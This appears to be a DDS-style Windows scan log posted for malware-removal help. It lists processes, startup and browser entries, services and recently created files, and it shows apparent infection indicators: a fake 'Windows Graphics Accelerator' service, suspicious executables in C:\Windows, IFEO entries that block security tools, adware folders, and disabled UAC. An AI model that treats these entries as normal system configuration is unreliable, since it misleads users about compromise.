AV: ThreatTrack Security VIPRE *Enabled/Updated* {FFE93D16-FD09-0282-C7D3-8B1731B6A051}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: ThreatTrack Security VIPRE *Enabled/Updated* {4488DCF2-DB33-0D0C-FD63-B0654A31EAEC}
FW: ThreatTrack Security VIPRE *Enabled* {C7D2BC33-B766-03DA-EC8C-2222CF65E72A}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktopUpdater.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\GFI\LanGuard 11 Agent\lnssatt.exe
C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\PDF Complete\pdfsvc.exe
C:\Program Files (x86)\VIPRE\SBPIMSvc.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Program Files\Eraser\Eraser.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Gyazo\GyStation.exe
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Ask.com\Updater\Updater.exe
C:\Program Files (x86)\VIPRE\SBAMTray.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe
C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\VIPRE\SBAMSvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\WUDFHost.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\cygavb.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files\Logitech\SetPointP\LogiAppBroker.exe
C:\Program Files (x86)\GFI\LanGuard 11 Agent\Mantle.exe
C:\Windows\wnavga.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=U162
uURLSearchHooks: UrlSearchHook Class: {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
uURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
mURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
mWinlogon: Userinit = userinit.exe
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll
BHO: SteadyVideoBHO Class: {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - c:\Program Files (x86)\AMD\SteadyVideo\SteadyVideo.dll
BHO: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: VIPRE Search Guard Helper: {963C8283-AE7F-4AA6-9B3B-847A8FC62C5E} - C:\Program Files (x86)\VIPRE\VSGN.dll
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
BHO: KeyDownload Class: {C1EA4179-A319-4c6a-A3E5-67FF3592A12E} - C:\Program Files (x86)\KeyDownload-Addon\KeyDownload.dll
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -
BHO: Ask Toolbar: {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} -
TB: Ask Toolbar: {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
TB: VIPRE Search Guard Toolbar: {A924C17A-5E94-4E02-BED5-49720BA6F7FA} - C:\Program Files (x86)\VIPRE\VSGN.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
uRun: [GoogleChromeAutoLaunch_2B44178D45242E3C3BC4A3F0B1461B2F] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Gyazo] C:\Program Files (x86)\Gyazo\GyStation.exe
mRun: [StartCCC] "c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [PDF Complete] C:\Program Files (x86)\PDF Complete\pdfsty.exe
mRun: [ApnUpdater] "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
mRun: [SBAMTray] "C:\Program Files (x86)\VIPRE\SBAMTray.exe"
mRun: [ApnTBMon] "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [BingDesktop] C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktop.exe /fromkey
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MCAFEE~1.LNK - C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002}\2427967696474756 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002}\E45445745414254313 : DHCPNameServer = 192.168.1.1
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\AMD\SteadyVideo\VideoMIMEFilter.dll
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\AMD\SteadyVideo\VideoMIMEFilter.dll
Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - C:\Program Files (x86)\VIPRE\VSGN.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.134\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
mASetup: {F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1} - msiexec /fu {F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1} /qn
IFEO: bitguard.exe - tasklist.exe
IFEO: bprotect.exe - tasklist.exe
IFEO: bpsvc.exe - tasklist.exe
IFEO: browserdefender.exe - tasklist.exe
IFEO: browserprotect.exe - tasklist.exe
x64-BHO: SteadyVideoBHO Class: {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - c:\Program Files\AMD\SteadyVideo\SteadyVideo.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-Run: [hpsysdrv] c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
x64-Run: [SBRegRebootCleaner] "C:\Program Files (x86)\GFI Software\VIPRE\SBRC.exe"
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-Run: [Eraser] "C:\Program Files\Eraser\Eraser.exe" -atRestart
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
x64-Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll
x64-Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll
x64-Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {B34A07DD-C6F7-414A-AE63-01019482EAF0} - msiexec /fu {B34A07DD-C6F7-414A-AE63-01019482EAF0} /qn
x64-IFEO: bitguard.exe - tasklist.exe
x64-IFEO: bprotect.exe - tasklist.exe
x64-IFEO: bpsvc.exe - tasklist.exe
x64-IFEO: browserdefender.exe - tasklist.exe
x64-IFEO: browserprotect.exe - tasklist.exe
.
Note: multiple IFEO entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\FFCory\AppData\Roaming\Mozilla\Firefox\Profiles\3p8047d6.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://www.bing.com/?pc=U159
FF - prefs.js: keyword.URL - hxxp://www.bing.com/search?FORM=U159DF&PC=U159&q=
FF - prefs.js: network.proxy.type - 4
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMSS.dll
FF - plugin: C:\Users\FFCory\AppData\Roaming\Mozilla\plugins\np-mswmp.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_203.dll
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2012-1-12 78976]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2012-1-12 38528]
R1 SbFw;SbFw;C:\Windows\System32\drivers\SbFw.sys [2013-3-10 260816]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-1-12 204288]
R2 APNMCP;Ask Update Service;C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [2015-4-28 178568]
R2 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE [2011-7-20 249648]
R2 BingDesktopUpdate;Bing Desktop Update service;C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktopUpdater.exe [2014-6-3 173792]
R2 cvhsvc;Client Virtualization Handler;C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE [2015-3-18 822496]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 gfi_lanss11_attservice;GFI LanGuard 11 Attendant Service;C:\Program Files (x86)\GFI\LanGuard 11 Agent\lnssatt.exe [2012-11-23 133496]
R2 HP Support Assistant Service;HP Support Assistant Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe [2013-11-4 99128]
R2 HPClientSvc;HP Client Services;C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe [2010-10-11 346168]
R2 NOBU;Norton Online Backup;C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2010-6-1 2804568]
R2 pdfcDispatcher;PDF Document Manager;C:\Program Files (x86)\PDF Complete\pdfsvc.exe [2012-1-12 1128952]
R2 SBAMSvc;VIPRE Internet Security;C:\Program Files (x86)\VIPRE\SBAMSvc.exe [2013-8-30 3937472]
R2 sbapifs;sbapifs;C:\Windows\System32\drivers\sbapifs.sys [2013-6-18 88928]
R2 SBPIMSvc;SB Recovery Service;C:\Program Files (x86)\VIPRE\SBPIMSvc.exe [2013-8-30 176016]
R2 sftlist;Application Virtualization Client;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe [2014-10-8 534184]
R2 WinGraph;Windows Graphics Accelerator;C:\Windows\wnavga.exe [2015-7-2 7680]
R3 gfiark;gfiark;C:\Windows\System32\drivers\gfiark.sys [2013-3-10 41032]
R3 gfiutil;gfiutil;C:\Windows\System32\drivers\gfiutil.sys [2013-11-19 31264]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\drivers\LEqdUsb.sys [2014-3-18 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\drivers\LHidEqd.sys [2014-3-18 13080]
R3 netr28x;Ralink 802.11n Extensible Wireless Driver;C:\Windows\System32\drivers\netr28x.sys [2012-1-12 2486416]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-1-12 533096]
R3 SBFWIMCLMP;GFI Software Firewall NDIS IM Filter Miniport;C:\Windows\System32\drivers\SbFwIm.sys [2013-3-10 120608]
R3 sbwtis;sbwtis;C:\Windows\System32\drivers\sbwtis.sys [2012-12-11 88864]
R3 ScreamBAudioSvc;ScreamBee Audio;C:\Windows\System32\drivers\ScreamingBAudio64.sys [2012-7-31 38992]
R3 Sftfs;Sftfs;C:\Windows\System32\drivers\Sftfslh.sys [2014-10-8 766632]
R3 Sftplay;Sftplay;C:\Windows\System32\drivers\Sftplaylh.sys [2014-10-8 273576]
R3 Sftredir;Sftredir;C:\Windows\System32\drivers\Sftredirlh.sys [2014-10-8 29352]
R3 Sftvol;Sftvol;C:\Windows\System32\drivers\Sftvollh.sys [2014-10-8 23208]
R3 sftvsa;Application Virtualization Service Agent;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [2014-10-8 211104]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2012-1-12 47232]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 lxqvbcbiws32;lxqvbcbiws32;C:\Program Files\015\lxqvbcbiws32.exe run options=10001010150000000000000000000000 source=13 stdout=reg:HKEY_LOCAL_MACHINE,Software\\MIA,MIA_ERROR --> C:\Program Files\015\lxqvbcbiws32.exe run options=10001010150000000000000000000000 source=13 stdout=reg:HKEY_LOCAL_MACHINE,Software\\MIA,MIA_ERROR [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-3 327296]
S3 BBSvc;Bing Bar Update Service;C:\Program Files (x86)\Microsoft\BingBar\BBSvc.EXE [2011-8-1 195320]
S3 BTWAMPFL;BTWAMPFL;C:\Windows\System32\drivers\btwampfl.sys [2015-1-20 349224]
S3 btwl2cap;Bluetooth L2CAP Service;C:\Windows\System32\drivers\btwl2cap.sys [2015-1-20 39464]
S3 EraserUtilDrv11122;EraserUtilDrv11122;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11122.sys [2012-5-29 138360]
S3 EraserUtilDrv11210;EraserUtilDrv11210;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11210.sys [2012-8-7 138912]
S3 EraserUtilDrv11220;EraserUtilDrv11220;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11220.sys [2013-3-9 138912]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2012-2-19 138360]
S3 GamesAppIntegrationService;GamesAppIntegrationService;C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [2015-2-9 347200]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2014-12-16 265808]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-6-10 114688]
S3 ManyCam;ManyCam Virtual Webcam;C:\Windows\System32\drivers\mcvidrv.sys [2014-5-13 42224]
S3 mcaudrv_simple;ManyCam Virtual Microphone;C:\Windows\System32\drivers\mcaudrv_x64.sys [2014-5-13 35440]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [2013-9-6 288776]
S3 SBFWIMCL;GFI Software Firewall NDIS IM Filter Service;C:\Windows\System32\drivers\SbFwIm.sys [2013-3-10 120608]
S3 SbHips;SbHips;C:\Windows\System32\drivers\sbhips.sys [2013-3-10 63184]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-8-16 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-2-20 1255736]
S3 WSDScan;WSD Scan Support via UMB;C:\Windows\System32\drivers\WSDScan.sys [2009-7-13 25088]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: SC2Editor.exe: open="C:/Program Files (x86)/StarCraft II/Support/SC2Editor.exe" "%1"
ShellExec: SC2Switcher.exe: open="C:/Program Files (x86)/StarCraft II/Support/SC2Switcher.exe" "%1"
.
=============== Created Last 30 ================
.
2015-07-14 23:25:30 -------- d-----w- C:\AdwCleaner
2015-07-14 23:16:55 18524336 ----a-w- C:\Windows\SysWow64\FlashPlayerInstaller.exe
2015-07-10 16:02:14 -------- d-----w- C:\Program Files\iPod
2015-07-10 16:02:14 -------- d-----w- C:\Program Files (x86)\iTunes
2015-07-10 16:02:13 -------- d-----w- C:\Program Files\iTunes
2015-07-09 19:41:53 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-09 19:41:53 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin5.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin4.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin3.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin2.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin5.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin4.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin3.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin2.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin.dll
2015-07-04 03:36:42 -------- d-----w- C:\Users\FFCory\AppData\Roaming\TVMC
2015-07-04 00:07:58 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Kodi
2015-07-03 23:39:41 -------- d-----w- C:\ProgramData\Package Cache
2015-07-03 23:37:02 -------- d-----w- C:\Program Files (x86)\Kodi
2015-07-03 22:55:54 -------- d-----w- C:\Users\FFCory\AppData\Local\Eraser 6
2015-07-03 19:56:17 -------- d-----w- C:\Users\FFCory\AppData\Roaming\ZinioReader4
2015-07-03 15:56:26 -------- d-----w- C:\ProgramData\Blio
2015-07-03 15:56:19 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Blio
2015-07-03 15:52:12 -------- d-----w- C:\Program Files (x86)\VS Revo Group
2015-07-03 15:10:30 12221144 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{05FA8A8A-8F7D-4B94-A8A1-2CF57590660C}\mpengine.dll
2015-07-03 15:03:49 -------- d-----w- C:\Program Files\Eraser
2015-07-02 23:33:42 -------- d-----w- C:\Users\FFCory\AppData\Roaming\51A47C4D-1435880022-34FE-4739-B5267357D0CD
2015-07-02 23:28:07 -------- d-----w- C:\Program Files (x86)\Exploremedia
2015-07-02 23:28:00 -------- d-----w- C:\ProgramData\Vnalieehusf
2015-07-02 23:27:50 -------- d-----w- C:\Program Files (x86)\predm
2015-07-02 23:24:21 -------- d-----w- C:\ProgramData\Ebon
2015-07-02 23:21:51 38 ----a-w- C:\Windows\initcvtr.bat
2015-07-02 23:21:51 3542 ----a-w- C:\Windows\mstdcvtr.bat
2015-07-02 23:21:48 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Winsta
2015-07-02 23:21:47 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Convertor
2015-07-02 23:21:46 -------- d-----w- C:\Users\FFCory\AppData\Roaming\PDFConvert
2015-07-02 23:21:46 -------- d-----w- C:\Users\FFCory\AppData\Roaming\51A47C4D-1435879306-34FE-4739-B5267357D0CD
2015-07-02 23:21:45 -------- d-----w- C:\Users\FFCory\AppData\Local\{74BEAA89-73AB-472B-9C34-C63AA6C03F96}
2015-07-02 23:21:39 -------- d-----w- C:\ProgramData\Ebonmedia
2015-07-02 23:21:38 -------- d-----w- C:\Program Files\13
2015-07-02 23:21:37 -------- d-----w- C:\Program Files\015
2015-06-17 04:23:50 94208 ----a-w- C:\Windows\SysWow64\QuickTimeVR.qtx
2015-06-17 04:23:50 69632 ----a-w- C:\Windows\SysWow64\QuickTime.qts
.
==================== Find3M ====================
.
2015-06-12 20:51:12 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
